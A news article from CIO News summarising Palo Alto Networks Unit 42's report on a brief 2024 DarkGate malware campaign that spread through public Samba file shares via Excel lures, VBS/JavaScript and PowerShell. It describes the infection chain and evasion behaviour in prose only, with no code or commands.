A brief campaign of DarkGate malware that attacked PCs by leveraging Samba file sharing as a vector has been discovered by cybersecurity researchers.
Researchers studying cybersecurity have uncovered a brief campaign of DarkGate malware that infected computers by using Samba file shares as a vector. Palo Alto Networks Unit 42 reports that this activity took place in March and April of 2024 and involved the use of Samba file shares with public access that hosted JavaScript and Visual Basic Script (VBS) files. The effort was directed at areas in Europe, North America, and some portions of Asia. Security experts Brad Duncan, Uday Pratap Singh, Anmol Maurya, Yijie Sui, and Vishwa Thothathri said, “This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware.” After being discovered for the first time in 2018, DarkGate has developed into a malware-as-a-service (MaaS) product that is available to a certain customer base. It has functions for code execution, cryptocurrencies, and remote control of hacked hosts.
Since the QakBot infrastructure was taken down by international law enforcement in August 2023, attacks employing DarkGate have grown dramatically. Unit 42’s campaign started with Microsoft Excel (.xlsx) files that, when opening, ask recipients to click an embedded Open button. This prompts the recipients to download and run VBS code stored on a Samba file. The AutoHotKey-based DarkGate package is downloaded by the PowerShell script that is retrieved and executed by the VBS script. Similar infection sequences that downloaded and ran the follow-up PowerShell script were also used; however, these used JavaScript files rather than VBS.
Similar infection sequences that downloaded and ran the follow-up PowerShell script were also used; however, these used JavaScript files rather than VBS. In order to avoid detection, DarkGate works by looking for different anti-malware applications and analyzing CPU statistics to ascertain if it is operating on a real host or a virtual machine. Additionally, it keeps an eye on active processes to find debuggers, virtualization software, and reverse engineering tools. The researchers clarified, “DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text.” “DarkGate remains a potent reminder of the need for strong and proactive cybersecurity defenses as it continues to evolve and refine its methods of infiltration and resistance to analysis.”
Do Follow: CIO News LinkedIn Account | CIO News Facebook | CIO News Youtube | CIO News Twitter
About us:
CIO News is the premier platform dedicated to delivering the latest news, updates, and insights from the CIO industry. As a trusted source in the technology and IT sector, we provide a comprehensive resource for executives and professionals seeking to stay informed and ahead of the curve. With a focus on cutting-edge developments and trends, CIO News serves as your go-to destination for staying abreast of the rapidly evolving landscape of technology and IT. Founded in June 2020, CIO News has rapidly evolved with ambitious growth plans to expand globally, targeting markets in the Middle East & Africa, ASEAN, USA, and the UK.
CIO News is a proprietary of Mercadeo Multiventures Pvt Ltd.
